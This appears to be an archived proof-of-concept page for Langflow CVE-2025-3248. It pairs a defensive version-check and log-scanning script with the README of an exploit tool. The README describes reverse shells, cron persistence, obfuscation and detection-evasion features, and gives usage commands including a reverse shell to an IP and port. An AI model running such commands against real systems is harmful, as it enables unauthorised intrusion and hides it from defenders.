POC details: 16adf7c88402d2c37999b6b52826825af928c2ab

Source
Related vulnerability
Title: Langflow security vulnerability (CVE-2025-3248)
Description: Langflow is an open-source visual framework from Langflow for building multi-agent and RAG applications. Langflow versions before 1.3.0 contain a security vulnerability: the /api/v1/validate/code endpoint has a code-injection flaw that may allow a remote, unauthenticated attacker to execute arbitrary code.
Description
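As an added defensive example (not part of this POC or of the Langflow project), the following Python checks a reported Langflow version against the 1.3.0 fix boundary named above and scans access-log lines for POST requests to the /api/v1/validate/code endpoint. The Common Log Format, the sample log entries and the function names are assumptions made for the example.

```python
import re

# Per the advisory text above, Langflow releases before 1.3.0 are affected.
FIXED_VERSION = (1, 3, 0)
VULN_PATH = "/api/v1/validate/code"

def parse_version(version: str) -> tuple:
    """Turn '1.2.0' (or '1.2.0rc1', suffix ignored) into a comparable tuple."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(p) for p in m.groups())

def is_affected_version(version: str) -> bool:
    """True when the instance reports a release older than the 1.3.0 fix."""
    return parse_version(version) < FIXED_VERSION

# Assumed Common Log Format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def find_validate_code_hits(log_lines):
    """Return every POST to the vulnerable endpoint (query string ignored)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip unparseable lines instead of aborting the scan
        path = m.group("path").split("?", 1)[0]
        if m.group("method") == "POST" and path == VULN_PATH:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": int(m.group("status"))})
    return hits

# Constructed sample log lines (not real traffic); one line is deliberately malformed.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2025:12:00:01 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Apr/2025:12:00:02 +0000] "GET /api/v1/flows HTTP/1.1" 200 2048',
    '203.0.113.5 - - [10/Apr/2025:12:00:05 +0000] "POST /api/v1/validate/code?x=1 HTTP/1.1" 500 128',
    'garbage line that should be skipped',
]

if __name__ == "__main__":
    for v in ("1.2.0", "1.3.0"):
        print(v, "affected" if is_affected_version(v) else "fixed")
    for hit in find_validate_code_hits(SAMPLE_LOG):
        print("ALERT: POST to", VULN_PATH, hit)
```

Because the affected endpoint needed no authentication, any POST to it from an unexpected source on a pre-1.3.0 instance is worth an alert, regardless of the response status.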
Remote Code Execution Exploit for Langflow (CVE-2025-3248) - [ By S4Tech ]
Introduction
# Langflow RCE Exploit (CVE-2025-3248)

![Python Version](https://img.shields.io/badge/python-3.6%2B-blue)
![License](https://img.shields.io/badge/license-MIT-green)
![Platform](https://img.shields.io/badge/platform-Linux%20%7C%20Windows-lightgrey)

Remote Code Execution Exploit for Langflow (CVE-2025-3248)

## Features

- Automatic vulnerability detection
- Multiple exploitation modes:
  - Interactive shell
  - Single command execution
  - Reverse shell connection
- File upload capability
- Colorized user interface
- Multiple reverse shell methods
- Command history persistence


## 📌 Changelog (v2.0)

### ✨ New Features:
- **Advanced payload system** with 5 execution methods  
- **File upload/download** with Base64 encoding  
- **Persistence** via cron jobs (`persist` command)  
- **Interactive shell upgrades**:  
  - `upload local_path remote_path`  
  - `download remote_path local_path`  
  - `clear` command for terminal  

### 🛡️ Security Enhancements:
- **Automatic payload obfuscation** (Base64 + random variants)  
- **Header rotation** per request:  
  - Random `User-Agent`  
  - Spoofed `X-Forwarded-For` IPs  
- **HTTPS bypass** (self-signed cert support)  
- **No redirects** to avoid detection  

### ⚡ Technical Improvements:
- **Multi-stage vulnerability verification**  
- **Enhanced error handling** for unstable connections  
- **Full session logging** to `exploit_log.txt`  
- **Command history** persistence (`.langflow_shell_history`)  

### 📊 Version Comparison:

| Feature                | v1.0         | v2.0         |
|------------------------|--------------|--------------|
| Payload Methods        | 1            | 5            |
| File Transfer          | ❌ Not supported | ✅ Supported |
| Persistence           | ❌            | ✅           |
| Stealth Level         | Basic        | Advanced     |
| Session Logging       | ❌            | ✅           |

### 🐛 Bug Fixes:
- Fixed HTTPS connection issues  
- Improved handling of special characters in commands  
- Stabilized reverse shell reliability  



## Requirements

- Python 3.6 or newer
- Required libraries:
  - `requests`
  - `colorama`
  - `readline`

## Installation

```bash
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
```

## Usage

```bash
python exploit.py <URL> [options]
```

### Available Options:

| Option              | Description                                   |
|---------------------|-----------------------------------------------|
| `--shell`           | Start interactive shell                       |
| `--reverse IP PORT` | Launch reverse shell to specified IP:PORT     |
| `--command CMD`     | Execute single command                        |
| `--verbose`         | Enable verbose output                         |
| `--timeout SEC`     | Set request timeout (default: 10s)            |

### Examples:

1. Check vulnerability:
```bash
python exploit.py http://target.com
```

2. Start interactive shell:
```bash
python exploit.py http://target.com --shell
```

3. Execute single command:
```bash
python exploit.py http://target.com --command "whoami"
```

4. Launch reverse shell:
```bash
python exploit.py http://target.com --reverse 192.168.1.100 4444
```

## Screenshots

![Image](https://raw.githubusercontent.com/0-d3y/langflow-rce-exploit/refs/heads/main/Langflow-Figure-1-updated%20(1).png)  


## Warning

⚠️ This tool is for **educational and authorized testing purposes only**.  
⚠️ Unauthorized use against systems you don't own or have permission to test is illegal.

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Author

- **Mr.SaMi**  
  [![Twitter](https://img.shields.io/badge/Twitter-@Linux_ye-blue)](https://twitter.com/Linux_ye)  
  [![Instagram](https://img.shields.io/badge/Instagram-@s4tech.ye-purple)](https://instagram.com/s4tech.ye)

## Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
File snapshot

[4.0K] /data/pocs/16adf7c88402d2c37999b6b52826825af928c2ab
├── [9.5K] exploit.py
├── [100K] Langflow-Figure-1-updated (1).png
├── [ 1] output.txt
├── [4.0K] README.md
└── [ 66] requirements.txt
0 directories, 5 files
The Shenlong (神龙) bot has cached this for you.
Notes
    1. It is recommended to access the original via the Source link first.
    2. If the source is down or unreachable, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.